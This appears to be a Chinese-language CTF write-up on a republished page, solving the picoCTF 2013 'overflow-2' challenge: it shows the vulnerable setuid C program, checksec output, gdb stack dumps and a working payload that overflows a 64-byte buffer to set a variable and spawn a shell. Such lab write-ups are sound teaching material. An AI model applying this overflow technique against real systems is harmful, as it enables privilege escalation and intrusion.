pico-ctf-2013 overflow-2
来源:互联网 发布:linux如何运行脚本 编辑:程序博客网 时间:2024/05/21 05:24
栈溢出入门系列入门教程二
overflow2.c
#include <stdio.h>#include <stdlib.h>#include <string.h>#include <unistd.h>#include <sys/types.h>#include "dump_stack.h"void vuln(int win, char *str) { char buf[64]; strcpy(buf, str); dump_stack((void **) buf, 23, (void **) &win); printf("win = %d\n", win); if (win == 1) { execl("/bin/sh", "sh", NULL); } else { printf("Sorry, you lose.\n"); } exit(0);}int main(int argc, char **argv) { if (argc != 2) { printf("Usage: stack_overwrite [str]\n"); return 1; } uid_t euid = geteuid(); setresuid(euid, euid, euid); vuln(0, argv[1]); return 0;}
dump_stack:打印当前cpu的堆栈.
gdb-peda$ checksecCANARY : disabledFORTIFY : disabledNX : disabledPIE : disabledRELRO : Partial
由此可见,该程序相当脆弱.只要我们溢出数据,使win为1即可.
两种方法:
方法一:
gdb --args ./overflow2 $(python -c "print 'A'*64+'B'*4")
gdb调试,由于源代码中有if,于是我们进入vuln函数,找到了if对应的汇编代码,如下:
0x8048666 <vuln+62>: mov DWORD PTR [esp],eax0x8048669 <vuln+65>: call 0x80483f0 <printf@plt>0x804866e <vuln+70>: mov eax,DWORD PTR [ebp+0x8]**0x8048671 <vuln+73>: cmp eax,0x1**0x8048674 <vuln+76>: jne 0x8048694 <vuln+108>0x8048676 <vuln+78>: mov DWORD PTR [esp+0x8],0x0
可见这次是拿地址为ebp+0x8的内容与1相比较.同本系列第一篇一样,在cmp出下断点,查看栈中的内容.
gdb-peda$ x/90x 0xffffce200xffffce20: 0x410x410x410x410x410x410x410x410xffffce28: 0x410x410x410x410x410x410x410x410xffffce30: 0x410x410x410x410x410x410x410x410xffffce38: 0x410x410x410x410x410x410x410x410xffffce40: 0x410x410x410x410x410x410x410x410xffffce48: 0x410x410x410x410x410x410x410x410xffffce50: 0x410x410x410x410x410x410x410x410xffffce58: 0x410x410x410x410x410x410x410x410xffffce60: 0x420x420x420x420x000xf10xea0xf70xffffce68: 0x980xce0xff0xff0x0b0x870x040x080xffffce70: 0x000x000x000x000x650xd10xff0xff0xffffce78: 0xe80x03
对应截图:
ebp+0x8=0xffffce70,0xffffce70与char数组相差0x50(0xffffce70-0xffffce20).于是乎构造出
./overflow2 $(python -c "print 'A'*80+'\x01\x00\x00\x00'")
结果图:
其实前本系列前两篇文章思路差不多.
方法二:思路就是写一个自动化脚本,来循环判断是否溢出成功.实现还是有点困难,以后再写.
注:由于操作系统的原因,一些地址可能会有不同,在此一定要以你的电脑上的地址为准.附带相关文件地址:文件地址.欢迎评论!!!
0 0
- pico-ctf-2013 overflow-2
- pico-ctf-2013 overflow-1
- pico-ctf-2013 overflow-3
- pico-ctf 2013 overflow-4
- pico-ctf 2013 overflow-5
- PICO CTF 2013 PHP 2: 85
- Asis CTF 2013: "RSAng"
- CTF
- ctf
- ctf
- ctf
- CTF
- Backdoor CTF 2013: Web 50
- CTF考核writeup(2)
- CTF解题笔记(2)
- overflow(2)
- overflow
- overflow
- 腾讯云CentOS7.0使用yum安装mysql及使用遇到的问题
- SAP HANA SQL GROUP BY / ORDER BY / OVER / CASE
- csu 1811 Tree Intersection 2016湖南省赛 I
- 算法学习笔记--NP完全问题
- |poj 1986|LCA|Distance Queries
- pico-ctf-2013 overflow-2
- 为wordpress安装主题时如何跳过对ftp服务器的验证
- Find Peak Element
- 0426-CSS三大特性之继承性
- MD5加密算法简单实现
- hibernate:XXX is not mapped问题
- PAT 乙等 1018 C语言
- Learning to Compare Image Patches via Convolutional Neural Networks
- 针对自定义标题栏拖动效果问题解决